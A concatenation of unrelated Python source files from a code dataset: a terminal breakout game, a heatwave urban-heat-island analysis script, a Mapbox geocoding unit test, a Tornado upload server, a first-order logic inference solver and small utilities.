self.__powers.append(padShoot(self.__bricks[random.randint(0, 5)][random.randint(0, self.__brickCtr - 1)].getPos()))
self.__powers.append(ballFire(self.__bricks[random.randint(0, 5)][random.randint(0, self.__brickCtr - 1)].getPos()))
if(self.__lvl == lvlnum):
self.__bricks.append([])
self.__bricks[0].append(Brick(3, [1, (int)(cols / 2) - 4]))
self.__paddle = Paddle([rows - 2, (int)(cols / 2) - 2])
self.__balls = [Ball([self.__paddle.getPos()[0] - 1, self.__paddle.getPos()[1] + (int)(self.__paddle.getDim()[1] / 2)])]
self.__ballCtr = 1
def spawnBricks(self, ufo):
for i in range(1, 3 + 1):
if(len(self.__bricks) > i):
self.__bricks[i] = []
else:
self.__bricks.append([])
for j in range(0, cols - 3, 3):
self.__bricks[i].append(Brick(0, [ufo.getPos()[0] + ufo.getDim()[0] + i - 1, j]))
# placing normal bricks
def findPup(self, type):
for x in self.__powers:
if(x.getType() == type):
return x
def bossMove(self):
ufo = self.__bricks[0][0]
pad = self.__paddle
if(ufo.getType() != 3):
return
ufoMid = (int)(ufo.getPos()[1] + ufo.getDim()[1] / 2)
if(pad.getPos()[1] + pad.getDim()[1] - 1 < ufoMid):
ufo.setVel([0, -1])
ufo.move()
ufo.setVel([0, 0])
elif(pad.getPos()[1] > ufoMid):
ufo.setVel([0, 1])
ufo.move()
ufo.setVel([0, 0])
def handle_input(self, txt):
if(txt == 'a' or txt == 'A'):
self.__paddle.keybrd(1, self.__balls)
elif(txt == 'd' or txt == 'D'):
self.__paddle.keybrd(0, self.__balls)
elif(txt == ' '):
self.__paddle.release(self.__balls)
self.__lifeRec = False
retPow = self.findPup(6)
if(retPow and retPow.getTime() == -1):
self.__paddle.setStick(False)
if(txt == 'n' or txt == 'N'):
return True
elif(txt == 'q'):
print("\033[?25h")
quit()
def verticalCol(self, pos1, pos2, dim1, dim2, fix=False):
if(set(range(pos1[0], pos1[0] + dim1[0])) & set(range(pos2[0], pos2[0] + dim2[0]))):
if(fix and set(range(pos1[1], pos1[1] + dim1[1])) & set(range(pos2[1], pos2[1] + dim2[1]))):
return True
else:
return False
return True
def findBrickByPos(self, pos):
for m in range(0, len(self.__bricks)):
for n in range(0, len(self.__bricks[m])):
if(self.__bricks[m][n].getPos() == pos):
if(not self.__bricks[m][n].getActive()):
return None
return self.__bricks[m][n]
def findBricks(self, brick, fire=False):
posit = brick.getPos()
dim = brick.getDim()
if(brick.getType() == 2 or fire):
for a in range(posit[0] - 1 * dim[0], posit[0] + 2 * dim[0], dim[0]):
for b in range(posit[1] - 1 * dim[1], posit[1] + 2 * dim[1], dim[1]):
if(a == posit[0] and b == posit[1]):
continue
ret = self.findBrickByPos([a, b])
if(ret != None):
self.__explode.append(ret)
def explosion(self):
length = len(self.__explode)
for z in range(0, length):
self.findBricks(self.__explode[z])
self.__explode[z].collide(True)
self.__score += points
for k in range(0, len(self.__powers)):
if(self.__powers[k].getPos() == self.__explode[z].getPos() and not self.__powers[k].getActive()):
self.__powers[k].activate(self.__powers[k].getPos())
self.__powers[k].setVel([-2, 0])
for z in range(0, length):
del self.__explode[0]
def colChck(self, pos1, dim1, pos2, dim2):
if(set(range(pos1[0], pos1[0] + dim1[0])) & set(range(pos2[0], pos2[0] + dim2[0]))):
if(set(range(pos1[1], pos1[1] + dim1[1])) & set(range(pos2[1], pos2[1] + dim2[1]))):
return True
return False
def collision(self, obj, flags):
# obj always moving obj such as ball or powerup
# flags[0] --> paddle interaction type, flags[1] --> brick interaction type
p1 = np.array(obj.getPos()[:])
v1 = np.array(obj.getVel()[:])
dim1 = obj.getDim()[:]
sign = [1, 1]
if(v1[0]):
sign[0] = (int)(v1[0] / abs(v1[0]))
if(v1[1]):
sign[1] = (int)(v1[1] / abs(v1[1]))
for r in range(0, abs(v1[0]) + 1):
for c in range(0, abs(v1[1]) + 1):
cr = p1[0] + r * sign[0]
cc = p1[1] + c * sign[1]
pos1 = [cr, cc]
if(cr == p1[0] and cc == p1[1]):
continue
if(flags[0] == 1):
pos2 = np.array(self.__paddle.getPos()) + np.array(self.__paddle.getVel())
dim2 = self.__paddle.getDim()
if(self.colChck(pos1, dim1, pos2, dim2)):
if(self.verticalCol(obj.getPos(), self.__paddle.getPos(), dim1, dim2)):
self.__paddle.collide(obj)
obj.collide([-1 * obj.getVel()[0], obj.getVel()[1]])
if(time.time() - self.__start >= timeLim):
self.__moveBr += 1
return
elif(flags[0] == 2):
pos2 = np.array(self.__paddle.getPos()) + np.array(self.__paddle.getVel())
dim2 = self.__paddle.getDim()
if(self.colChck(pos1, dim1, pos2, dim2)):
if(self.verticalCol(obj.getPos(), self.__paddle.getPos(), dim1, dim2)):
return 1
if(flags[1]):
for i in range(0, len(self.__bricks)):
for j in range(0, len(self.__bricks[i])):
if(not self.__bricks[i][j].getActive()):
continue
pos2 = np.array(self.__bricks[i][j].getPos()) + np.array(self.__bricks[i][j].getVel())
dim2 = self.__bricks[i][j].getDim()
if(self.colChck(pos1, dim1, pos2, dim2)):
thru = False
fire = False
if(flags[1] == 1):
thru = obj.getThru()
fire = obj.getFire()
self.findBricks(self.__bricks[i][j], fire)
self.__bricks[i][j].collide(thru, fire)
btype = self.__bricks[i][j].getType()
blife = self.__bricks[i][j].getLife()
if(btype == 3 and (blife == spawn1 or blife == spawn2)):
self.__spawn = True
if(not self.__bricks[i][j].getActive()):
self.__score += points
if(self.__bricks[i][j].getType() == 3):
self.__score += 100 * points
for k in range(0, len(self.__powers)):
if(self.__powers[k].getPos() == self.__bricks[i][j].getPos() and not self.__powers[k].getActive()):
self.__powers[k].activate(self.__powers[k].getPos())
self.__powers[k].setVel(obj.getVel())
if(thru or fire):
continue
if(flags[1] == 2):
return True
elif(self.verticalCol(obj.getPos(), self.__bricks[i][j].getPos(), dim1, dim2, self.__bricks[i][j].getType() == 3)):
obj.collide([-1 * obj.getVel()[0], obj.getVel()[1]])
return
else:
obj.collide([obj.getVel()[0], -1 * obj.getVel()[1]])
return
return 0
def activation(self):
for i in range(0, len(self.__powers)):
if(self.__powers[i].getTime() != -1):
if(self.__powers[i].getType() == 3):
continue
self.__powers[i].power(self.__paddle, self.__balls)
def reset(self):
self.__paddle.setColor([font['black'], bg['white']])
self.__paddle.setShape(listify(" " * padLen))
if(not self.__lifeRec):
self.__paddle.setStick(False)
self.__paddle.setShoot(False)
for b in range(0, len(self.__balls)):
self.__balls[b].setFrame(ballFps)
self.__balls[b].setThru(False)
self.__balls[b].setFire(False)
def padPowCol(self):
temp = []
for i in range(0, len(self.__powers)):
if(not self.__powers[i].getActive()):
continue
ret = self.collision(self.__powers[i], [2, 0])
if(ret):
self.__powers[i].collide()
temp.append(self.__powers[i])
for i in range(0, len(temp)):
temp[i].setTime(time.time())
ctype = temp[i].getType()
if(ctype == 1 or ctype == 2 or ctype == 3):
self.__paddle.release(self.__balls)
if(ctype == 3):
self.__ballCtr *= 2
temp[i].power(self.__paddle, self.__balls)
def moveBricks(self):
for i in range(len(self.__bricks) - 1, -1, -1):
for j in range(0, len(self.__bricks[i])):
if(self.__bricks[i][j].getActive()):
for k in range(0, len(self.__powers)):
if(self.__powers[k].getPos() == self.__bricks[i][j].getPos() and not self.__powers[k].getActive()):
self.__powers[k].setVel([self.__moveBr, 0])
self.__powers[k].move()
self.__powers[k].setVel([0, 0])
break
self.__bricks[i][j].setVel([self.__moveBr, 0])
self.__bricks[i][j].move()
self.__bricks[i][j].setVel([0, 0])
if(self.__bricks[i][j].getPos()[0] + self.__bricks[i][j].getDim()[0] - 1 >= self.__paddle.getPos()[0]):
self.__lives = 1
self.lifeLoss()
self.__moveBr = 0
def lifeLoss(self):
self.__lives -= 1
if(not self.__lives):
self.__score -= (time.time() - self.__start) / 10
print(font['red'] + bg['reset'] + "You Lost! Game Over! Your final score is %.3f" %(self.__score))
print("\033[?25h")
quit()
for l in range(0, len(self.__powers)):
if(self.__powers[l].getTime() != -1):
self.__powers[l].setTime(-1)
self.__balls = []
self.__balls.append(Ball([self.__paddle.getPos()[0] - 1, self.__paddle.getPos()[1] + (int)(self.__paddle.getDim()[1] / 2)]))
self.__lifeRec = True
self.__paddle.setStick(True)
def won(self):
self.__score -= (time.time() - self.__start) / 10
if(self.__lvl == 3):
print(font['red'] + bg['reset'] + "Congratulations! You Won! Your final score is %.3f" %(self.__score))
print("\033[?25h")
quit()
else:
print(font['red'] + bg['reset'] + "Congratulations! You cleared level %d! Your current score is %.3f" %(self.__lvl, self.__score))
time.sleep(3)
return True
def timeCheck(self, tempTime, pup):
if(pup.getTime() != -1 and tempTime - pup.getTime() - period >= 1e-3):
pup.setTime(-1)
ctype = pup.getType()
if(ctype == 3):
self.__ballCtr = (int)(np.ceil(self.__ballCtr / 2))
pup.normal(self.__paddle, self.__balls, self.__ballCtr)
if(ctype == 1 or ctype == 2 or ctype == 3):
self.__paddle.release(self.__balls)
elif(not self.__lifeRec and ctype == 6):
self.__paddle.release(self.__balls)
def play(self):
os.system('cls' if os.name == 'nt' else 'clear')
print("\033[?25l")
ctr = 0
# self.findPup(3).setTime(time.time())
# self.findPup(8).setTime(time.time())
while True:
self.activation()
if self.__input.kbhit():
inp = self.__input.getch()
retd = self.handle_input(inp)
if(retd and self.won()):
return [self.__lives, self.__score]
self.__input.flush()
for i in range(0, len(self.__bricks)):
for j in range(0, len(self.__bricks[i])):
if(ctr % brickFps == 0):
self.__bricks[i][j].rainbow()
for l in range(0, len(self.__powers)):
oldVel = self.__powers[l].getVel()[:]
if(self.__powers[l].getActive() and ctr % gravFps == 0):
self.__powers[l].setVel([oldVel[0] + gravity, oldVel[1]])
if(len(self.__explode)):
self.explosion()
self.padPowCol()
for ball in self.__balls:
self.collision(ball, [1, 1])
delarr = []
for bull in range(0, len(self.__bullets)):
if(self.collision(self.__bullets[bull], [1, 2])):
delarr.append(bull)
for bull in range(0, len(delarr)):
del self.__bullets[delarr[bull] - bull]
delarr = []
loseFlag = False
for bomb in range(0, len(self.__bombs)):
if(self.collision(self.__bombs[bomb], [2, 0])):
loseFlag = True
delarr.append(bomb)
for bomb in range(0, len(delarr)):
del self.__bombs[delarr[bomb] - bomb]
if(loseFlag):
self.lifeLoss()
if(self.__moveBr):
self.moveBricks()
if(ctr % bossFps == 0):
self.bossMove()
tempTime = time.time()
for l in range(0, len(self.__powers)):
self.timeCheck(tempTime, self.__powers[l])
if(ctr % self.__powers[l].getFrame() == 0):
self.__powers[l].move()
tmpDel = []
below = True
ufo = self.__bricks[0][0]
for b in range(0, len(self.__balls)):
if(ctr % self.__balls[b].getFrame() == 0):
self.__balls[b].move(1)
if(self.__balls[b].getPos()[0] <= ufo.getPos()[0] + ufo.getDim()[0] + 2 + 3):
below = False
if(not self.__balls[b].getActive()):
tmpDel.append(self.__balls[b])
if(self.__spawn and below):
self.spawnBricks(ufo)
self.__spawn = False
delarr = []
for bull in range(0, len(self.__bullets)):
if(ctr % bullFps == 0):
if(self.__bullets[bull].move(2)):
delarr.append(bull)
for bull in range(0, len(delarr)):
del self.__bullets[delarr[bull] - bull]
delarr = []
for bomb in range(0, len(self.__bombs)):
if(ctr % bombFps == 0):
if(self.__bombs[bomb].move(2)):
delarr.append(bomb)
for bomb in range(0, len(delarr)):
del self.__bombs[delarr[bomb] - bomb]
if(self.__paddle.getShoot() and ctr % bullDelay == 0):
padPos = self.__paddle.getPos()
padDim = self.__paddle.getDim()
bul1 = Bullet("|", [padPos[0] - 1, padPos[1]], [-1, 0])
bul2 = Bullet("|", [padPos[0] - 1, padPos[1] + padDim[1] - 1], [-1, 0])
self.__bullets.append(bul1)
self.__bullets.append(bul2)
if(self.__lvl == lvlnum and ctr % bombDelay == 0):
ufoPos = self.__bricks[0][0].getPos()
ufoDim = self.__bricks[0][0].getDim()
bom = Bullet("o", [ufoPos[0] + ufoDim[0], ufoPos[1] + (int)(ufoDim[1] / 2)], [1, 0])
self.__bombs.append(bom)
for ball in tmpDel:
self.__balls.remove(ball)
if(not self.__balls):
self.lifeLoss()
win = True
for i in range(0, len(self.__bricks)):
for j in range(0, len(self.__bricks[i])):
if(self.__bricks[i][j].getType() != 1 and self.__bricks[i][j].getActive()):
win = False
break
if(not win):
break
if(win):
ret = self.won()
if(ret):
return [self.__lives, self.__score]
self.__screen.clear()
print(font['white'] + bg['reset'] + "Lives: ", self.__lives)
print(font['white'] + bg['reset'] + "Score: ", self.__score)
print(font['white'] + bg['reset'] + "Level: ", self.__lvl)
print(font['white'] + bg['reset'] + "Time: %.2f" %(time.time() - self.__start))
if(self.__lvl == lvlnum):
print(font['white'] + bg['reset'] + "Boss Life(Max 100): ", self.__bricks[0][0].getLife())
for bull in range(0, len(self.__bullets)):
self.__screen.populate(self.__bullets[bull])
for i in range(0, len(self.__bricks)):
for j in range(0, len(self.__bricks[i])):
self.__screen.populate(self.__bricks[i][j])
for bomb in range(0, len(self.__bombs)):
self.__screen.populate(self.__bombs[bomb])
for i in range(0, len(self.__powers)):
self.__screen.populate(self.__powers[i])
self.__screen.populate(self.__paddle)
for b in range(0, len(self.__balls)):
self.__screen.populate(self.__balls[b])
self.__screen.disp()
time.sleep(1 / fps)
ctr += 1
if(ctr == 301):
ctr = 1
self.reset()
|
10,566 | 2ff109418716d51885e5864f86dd1d054e77f5df | import numpy as np
import csv
import matplotlib.pyplot as plt
import pandas as pd
import glob
import ulmo
import os
import scipy.stats
results_filepath = 'plots/version1/'
pairs = pd.read_csv('USghcnpairs_stationlengths.csv')
df = pairs[917:]
df = df[~np.isnan(df['Urban brightness'])]
# compute UHI composite setting UHI @ HW day(0) to 0
composite_tmin = np.zeros([df.shape[0], 11])
composite_UHImin = np.zeros([df.shape[0], 11])
composite_UHImin2 = np.zeros([df.shape[0], 11])
composite_UHImin3 = np.zeros([df.shape[0], 11])
for i in range(0, df.shape[0]):
city = df.iloc[i]['City']
city = unicode(city, errors = 'ignore')
urbanID = df.iloc[i]['Urban station']
ruralID = df.iloc[i]['Rural station']
print city
# Downloadd from NCDC the station data, using the station ID listed in station list
urbandata = ulmo.ncdc.ghcn_daily.get_data(urbanID,
as_dataframe=True)
ruraldata = ulmo.ncdc.ghcn_daily.get_data(ruralID,
as_dataframe=True)
# Calculate minimum daily thresholds starting from 1965
startdate = '1985-01-01'#max(min(ruraldata['TMIN'].index), min(urbandata['TMIN'].index))
tmin = pd.to_numeric(ruraldata['TMIN'][startdate:].value/10.)
numhw = 30 # number of heatwaves
# min hw
tmin = tmin[startdate:]
hottestmin = tmin.iloc[(-tmin.values).argsort()[:numhw]] #Get the hottest days based off tmin
minheatwaves = hottestmin
# Make sure that events aren't duplicates
# get the time difference between events (sorted in temporal order, obviously)
time_diff = (minheatwaves.sort_index().index.to_timestamp().values[1:] - minheatwaves.sort_index().index.to_timestamp().values[:-1]).astype('timedelta64[D]')
# find where the events are not within 2 days of each other
minheatwaves = minheatwaves.sort_index()[time_diff > np.timedelta64(2, 'D')]
# Now the heatwaves are sorted in time order, but we want numhw (10) of the most severe events. Save the hottest 10 events
minheatwaves = minheatwaves.sort_values().iloc[0:10]
UHI = pd.to_numeric(urbandata['TMIN']['1985-01-01':].value/10.) - tmin
temp = tmin
heatwaves = minheatwaves
compositeTemp = np.zeros([heatwaves.shape[0], 11])
compositeUHI = np.zeros([heatwaves.shape[0], 11])
compositeUHI2 = np.zeros([heatwaves.shape[0], 11])
compositeUHI3 = np.zeros([heatwaves.shape[0], 11])
ii = 0
try:
for dates in heatwaves.index[:]:
compositeUHI[ii,:] = UHI[dates.to_timestamp()-pd.DateOffset(days=5):dates.to_timestamp()+pd.DateOffset(days=5)].values# -UHI[dates.to_timestamp()]
compositeTemp[ii,:]= temp[dates.to_timestamp()-pd.DateOffset(days=5):dates.to_timestamp()+pd.DateOffset(days=5)].values
ii = ii+1
composite_tmin[i,:] = np.nanmean(compositeTemp, axis=0)
# save out composite UHI
composite_UHImin[i,:] = np.nanmean(compositeUHI, axis=0)
except ValueError:
compositeUHI[ii,:] = np.nan*np.ones([1,11])
compositeTemp[ii,:]= np.nan*np.ones([1,11])
if np.mod(i,10) ==0 :
compositeTempDF = pd.DataFrame(composite_tmin, columns=np.arange(-5,6,1)).set_index(df['City'])
compositeTempDF.to_csv(results_filepath + 'composite_temp.csv')
compositeUHIDF = pd.DataFrame(composite_UHImin, columns=np.arange(-5,6,1)).set_index(df['City'])
compositeUHIDF.to_csv(results_filepath + 'composite_UHI.csv')
compositeTempDF = pd.DataFrame(composite_tmin, columns=np.arange(-5,6,1)).set_index(df['City'])
compositeTempDF.to_csv(results_filepath + 'composite_temp.csv')
compositeUHIDF = pd.DataFrame(composite_UHImin, columns=np.arange(-5,6,1)).set_index(df['City'])
compositeUHIDF.to_csv(results_filepath + 'composite_UHI.csv')
# plot heatwave composites for all stations
x = np.arange(-5,6)
# plot heatwave composites for all stations
plt.figure(figsize = [15,15])
#plot temperature,raw
plt.subplot(2,2,1)
for i in range(0, compositeTempDF.shape[0]) :
#print compositeUHIDF2.iloc[i].values[1:]
plt.plot(x, compositeTempDF.iloc[i].values[1:])
#compositeTempDF.mean(axis=0).plot(yerr = compositeTempDF.std(axis=0))
plt.plot( x, compositeTempDF.mean(), color = 'k', linewidth = 3)
plt.xlabel('Event Day')
plt.ylabel('Temp ($^\circ$C)')
plt.title('Heatwave Temperature')
#plot UHI, raw
plt.subplot(2,2,2)
for i in range(0, compositeUHIDF.shape[0]) :
#print compositeUHIDF2.iloc[i].values[1:]
plt.plot(x, compositeUHIDF.iloc[i].values[1:])
plt.plot( x, compositeUHIDF.mean(), color = 'k', linewidth = 3)
plt.axhline(0, linestyle = ':', color = 'k')
plt.xlabel('Event Day')
plt.ylabel('UHI ($\Delta^\circ$C)')
plt.title('Heatwave UHI Composite')
# plot temp, zeroed
plt.subplot(2,2,3)
for i in range(0, compositeTempDF.shape[0]) :
plt.plot(x, compositeTempDF.iloc[i].values[1:]- compositeTempDF.iloc[i].values[1])
#plt.plot( x, compositeTempDF.mean(), color = 'k', linewidth = 3)
plt.xlabel('Event Day')
plt.ylabel('$\Delta$ Temp ($\Delta ^\circ$C)')
plt.title('Heatwave Temperature')
plt.axhline(0, linestyle = ':', color = 'k')
#Plot UHI, zeroed out
plt.subplot(2,2,4)
for i in range(0, compositeUHIDF.shape[0]) :
#print compositeUHIDF2.iloc[i].values[1:]
plt.plot(x, compositeUHIDF.iloc[i].values[1:] - compositeUHIDF.iloc[i].values[1])
plt.axhline(0, linestyle = ':', color = 'k')
plt.plot(x, compositeUHIDF.mean(), color = 'k', linewidth = 3)
plt.xlabel('Event Day')
plt.ylabel('$\Delta$ UHI ($\Delta ^\circ$C)')
plt.title('Heatwave UHI Composite, zeroed to 1')
plt.savefig(results_filepath + 'allcityHWuhicomposite.png')
|
10,567 | e38d24d3ffc0237a75cd4188113751aa08c43371 | from unittest import TestCase
import requests
import mock
from orion.clients.geocode import ReverseGeocodingClient
class TestReverseGeocodingClient(TestCase):
def setUp(self):
self.auth_client = ReverseGeocodingClient('token')
self.unauth_client = ReverseGeocodingClient()
@mock.patch.object(requests, 'get', return_value=mock.MagicMock(
status_code=200,
json=lambda: {'features': [{'place_name': 'address'}]},
))
def test_reverse_geocode_valid(self, mock_request):
result = self.auth_client.reverse_geocode('lat', 'lon')
mock_request.assert_called_with(
url='https://api.mapbox.com/geocoding/v5/mapbox.places/lon,lat.json'
'?access_token=token&types=address',
)
self.assertEqual(result, {'place_name': 'address'})
@mock.patch.object(requests, 'get', return_value=mock.MagicMock(
status_code=200,
json=lambda: {'features': []},
))
def test_reverse_geocode_no_results(self, mock_request):
result = self.auth_client.reverse_geocode('lat', 'lon')
mock_request.assert_called_with(
url='https://api.mapbox.com/geocoding/v5/mapbox.places/lon,lat.json'
'?access_token=token&types=address',
)
self.assertIsNone(result)
@mock.patch.object(requests, 'get')
def test_reverse_geocode_no_access_token(self, mock_request):
result = self.unauth_client.reverse_geocode('lat', 'lon')
self.assertFalse(mock_request.called)
self.assertIsNone(result)
@mock.patch.object(requests, 'get', return_value=mock.MagicMock(status_code=401))
def test_reverse_geocode_api_failure(self, mock_request):
result = self.auth_client.reverse_geocode('lat', 'lon')
mock_request.assert_called_with(
url='https://api.mapbox.com/geocoding/v5/mapbox.places/lon,lat.json'
'?access_token=token&types=address',
)
self.assertIsNone(result)
|
10,568 | e593cf3e636fff276bb383f4c9a5e4afedfc72e7 | """Effectively does a "from sage.all import *" on the imported
module. Designed to be imported/called in an external sage session."""
import importlib, sys
def attach_sage(module):
attrs = {}
sage_mod = importlib.import_module("sage.all")
#do this rather than __dict__ to avoid binding private vars
for attr in filter(lambda a: a[0] != '_', dir(sage_mod)):
sys.modules[module].__dict__[attr] = getattr(sage_mod, attr)
|
10,569 | 4e37499449a3c5777d265d7dd6f925afebe7d0dc | # -*- coding: utf-8 -*-
#
# Copyright (C) 2010-2016 PPMessage.
# Guijin Ding, dingguijin@gmail.com
# All rights reserved
#
# backend/tornadoupload.py
#
# The entry of tornado upload service
#
from ppmessage.core.constant import TORNADO_FILEUPLOAD_PORT
from ppmessage.backend.tornadouploadapplication import TornadoUploadApplication
import tornado.ioloop
import tornado.options
import tornado.httpserver
import logging
tornado.options.define("port", default=TORNADO_FILEUPLOAD_PORT, help="", type=int)
if __name__ == "__main__":
tornado.options.parse_command_line()
_app = TornadoUploadApplication()
_http_server = tornado.httpserver.HTTPServer(_app)
logging.info("Starting Tornado Upload servcie with port: %d." % tornado.options.options.port)
_http_server.listen(tornado.options.options.port)
loop = tornado.ioloop.IOLoop.instance()
loop.start()
|
10,570 | 640a2105876b45b05e430ca4b287d2976a3b2fdb | user_name='sai'
print('your name:'+user_name.title())
print('your name:'+user_name.lower())
print('your name:'+user_name.upper())
|
10,571 | 3105e7321e7d4ac0e09bd64ec15f62f15a97fb92 | import collections
import copy
import sys
dict_of_substituted_value = collections.OrderedDict()
theta = collections.OrderedDict()
fo = open('output.txt', 'w')
askFlag = False
falsify = ''
forLoopDetection = set()
standard_list = []
standard_counter = 1
poo = True
def extractArguments(curr_goal):
extracted_arg = []
index1 = curr_goal.index("(")
index2 = curr_goal.index(")")
arguments = curr_goal[index1 + 1:index2]
argList = arguments.split(", ")
for arg in argList:
extracted_arg.append(arg.strip())
return extracted_arg
def extractPredicate(items):
position = items.index("(")
return items[0:position].strip()
def standardise_rule(rule):
global standard_list
global standard_counter
dict_of_sub_value = {}
rule_list = rule.split(" => ")
lhs = rule_list[0]
rhs = rule_list[1]
final_rule = ''
antecedent_list = lhs.split(" && ")
replaced_antecedent = ''
for each_antecedent in antecedent_list:
each_antecedent_arg_list = extractArguments(each_antecedent)
arg = []
for i in range(len(each_antecedent_arg_list)):
if each_antecedent_arg_list[i][0].islower():
if each_antecedent_arg_list[i] in standard_list:
if dict_of_sub_value.has_key(each_antecedent_arg_list[i]):
each_antecedent_arg_list[i] = dict_of_sub_value[each_antecedent_arg_list[i]]
arg.append(each_antecedent_arg_list[i])
else:
dict_of_sub_value[each_antecedent_arg_list[i]] = each_antecedent_arg_list[i] + str(
standard_counter)
each_antecedent_arg_list[i] = each_antecedent_arg_list[i] + str(standard_counter)
standard_counter += 1
arg.append(each_antecedent_arg_list[i])
else:
standard_list.append(each_antecedent_arg_list[i])
dict_of_sub_value[each_antecedent_arg_list[i]] = each_antecedent_arg_list[i]
arg.append(each_antecedent_arg_list[i])
else:
arg.append(each_antecedent_arg_list[i])
replaced_antecedent = replaced_antecedent + arguments_to_complete_goal(each_antecedent, arg) + " && "
replaced_antecedent = replaced_antecedent[0:replaced_antecedent.rfind("&&")]
consequent_arguments = extractArguments(rhs)
arg = []
for i in range(len(consequent_arguments)):
if consequent_arguments[i][0].islower():
if consequent_arguments[i] in standard_list:
if dict_of_sub_value.has_key(consequent_arguments[i]):
consequent_arguments[i] = dict_of_sub_value[consequent_arguments[i]]
arg.append(consequent_arguments[i])
else:
dict_of_sub_value[consequent_arguments[i]] = consequent_arguments[i] + str(standard_counter)
consequent_arguments[i] = consequent_arguments[i] + str(standard_counter)
standard_counter += 1
arg.append(consequent_arguments[i])
else:
standard_list.append(consequent_arguments[i])
dict_of_sub_value[consequent_arguments[i]] = consequent_arguments
arg.append(consequent_arguments[i])
else:
arg.append(consequent_arguments[i])
replaced_consequent = arguments_to_complete_goal(rhs, arg)
final_rule = replaced_antecedent.strip() + " => " + replaced_consequent.strip()
return final_rule
def arguments_to_complete_goal(curr_goal, curr_goal_arg_list):
args = ''
for item in curr_goal_arg_list:
args = args + item + ", "
args = args[0:args.rfind(",")]
curr_goal = extractPredicate(curr_goal) + '(' + args + ')'
return curr_goal
def replace_rule(dict_of_sub_value, rule):
consequent_arguments = extractArguments(rule)
arg = []
for each_argument in consequent_arguments:
if dict_of_sub_value.has_key(each_argument):
arg.append(dict_of_sub_value.get(each_argument))
else:
arg.append(each_argument)
replaced_rule = arguments_to_complete_goal(rule, arg)
return replaced_rule.strip()
def check_is_variable(item):
if item[0][0].islower():
return True
else:
return False
def check_length(item):
if len(item) == 1:
return True
else:
return False
def unify(x, y, dict_of_substituted_value1):
dict_of_substituted_value = copy.deepcopy(dict_of_substituted_value1)
if dict_of_substituted_value is None:
return None
elif x == y:
return dict_of_substituted_value
elif check_length(x) and check_is_variable(x) and type(x) == list:
return unify_Var(x, y, dict_of_substituted_value)
elif check_length(y) and check_is_variable(y) and type(y) == list:
return unify_Var(y, x, dict_of_substituted_value)
elif len(x) > 1 and len(y) > 1:
return unify(x[1:], y[1:], unify([x[0]], [y[0]], dict_of_substituted_value))
else:
return None
def unify_Var(var, x, dict_of_substituted_value):
if var[0] in dict_of_substituted_value:
return unify([dict_of_substituted_value[var[0]]], x, dict_of_substituted_value)
elif x[0] in dict_of_substituted_value:
return unify(var, [dict_of_substituted_value[x[0]]], dict_of_substituted_value)
else:
dict_of_substituted_value[var[0]] = x[0]
return dict_of_substituted_value
def LogPrinting(curr_goal):
curr_goal_arg_list = extractArguments(curr_goal)
args = ''
for item in curr_goal_arg_list:
if item[0].islower():
args += "_" # replace variables by _
else:
args = args + item
args += ", "
args = args[0:args.rfind(",")]
curr_goal_log = extractPredicate(curr_goal) + '(' + args + ')'
return curr_goal_log
# fo.write('Ask: ' + curr_goal_log + '\n')
def AND(KB, goals, theta):
global poo
poo = True
if theta is None:
pass
elif len(goals) == 0:
yield theta
else:
first, rest = goals[0], goals[1:]
for theta1 in OR(KB, replace_rule(theta, first), theta): # try printing false here
for theta2 in AND(KB, rest, theta1):
yield theta2
def OR(KB, goal, theta):
global askFlag
goal_predicate = extractPredicate(goal)
global poo
global falsify
rules = KB.get(goal_predicate)
counter = 0
forLoopDetection.add(goal)
pqr = LogPrinting(goal)
fo.write("Ask: " + pqr + '\n')
askFlag = False
ryr = False
# print rules,'****rules***'
for rule in rules:
# print rule,'============='
counter += 1
flag = True
if rule.find(" => ") > 0:
std_sentence = standardise_rule(rule)
rhs = std_sentence.split(" => ")[1]
lhs = std_sentence.split(" => ")[0].split(" && ")
else:
rhs = rule.split(" => ")[0]
lhs = []
another_theta = unify(extractArguments(rhs), extractArguments(goal), {})
if another_theta is None:
flag = False
if askFlag:
if flag:
# print rule,'============='
plo = LogPrinting(goal)
fo.write("Ask: " + plo + '\n')
askFlag = True
if flag:
for theta1 in AND(KB, lhs, unify(extractArguments(rhs), extractArguments(goal), theta)):
fo.write("True: " + replace_rule(theta1, goal) + '\n')
ryr = True
yield theta1
if counter == len(rules) and ryr == False:
fo.write("False: " + LogPrinting(replace_rule(theta, goal)) + '\n')
if not askFlag:
fo.write("False: " + LogPrinting(replace_rule(theta, goal)) + '\n')
falsify = goal
askFlag = True
def ASK(KB, each_query):
return OR(KB, each_query, {})
def main():
#fh = open('input.txt', 'r')
fh = open(sys.argv[2], 'r')
query = fh.readline()
query = query.strip()
ans = False
KB = collections.OrderedDict()
global forLoopDetection
rules = int(fh.readline())
for i in range(rules):
# while rules > 0:
sentence = fh.readline().strip()
temp_list = []
sentence = sentence.strip()
if sentence.find(" => ") > 0:
# std_sentence = standardise_rule(sentence)
temp = sentence.split(" => ")
predicate = extractPredicate(temp[1])
if KB.has_key(predicate):
temp_list = KB.get(predicate)
temp_list.append(sentence.strip())
KB[predicate] = temp_list
else:
temp_list.append(sentence.strip())
KB[predicate] = temp_list
else:
predicate = extractPredicate(sentence)
if KB.has_key(predicate):
temp_list = KB.get(predicate)
temp_list.append(sentence.strip())
KB[predicate] = temp_list
else:
temp_list.append(sentence)
KB[predicate] = temp_list
# rules -= 1
counter = 0
queries = query.split(" && ")
i = 0
for each_query in queries:
another_flag = False
forLoopDetection.add(each_query)
for i in ASK(KB, each_query):
if i is not None:
counter += 1
another_flag = True
break
if another_flag and counter == len(queries):
fo.write('True')
fo.close()
quit()
elif not another_flag:
# if falsify != each_query:
# pooo = LogPrinting(each_query)
# fo.write('False: ' + pooo + '\n')
fo.write("False")
fo.close()
quit()
if __name__ == "__main__":
main()
|
10,572 | 29891ddd9eea261dd5cc2a3ce95cf8663f93bfa4 | # Copyright (c) 2019 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
import unittest
from datetime import datetime
from dazl.model.core import ContractId
from dazl.plugins.capture import fmt_pretty
from dazl.plugins.capture.model_capture import LedgerCapture
class PluginsCaptureTest(unittest.TestCase):
def test_capture_handles_unknown_templates(self):
parties = list('ABC')
capture = LedgerCapture()
capture.capture('A',
ContractId('0:0', template_id='some_unknown_template'),
dict(some_field='some_value'), datetime.utcnow())
lines = fmt_pretty.format_entries(capture, parties)
output = '\n'.join(lines) + '\n'
self.assertTrue(output, 'some lines of output expected')
|
10,573 | 498362acf26b69038f6b77fadca5968259e293a7 | #!/usr/bin/python
#coding=utf-8
fo = open("dir/test.txt", "r+")
#读取10个字节
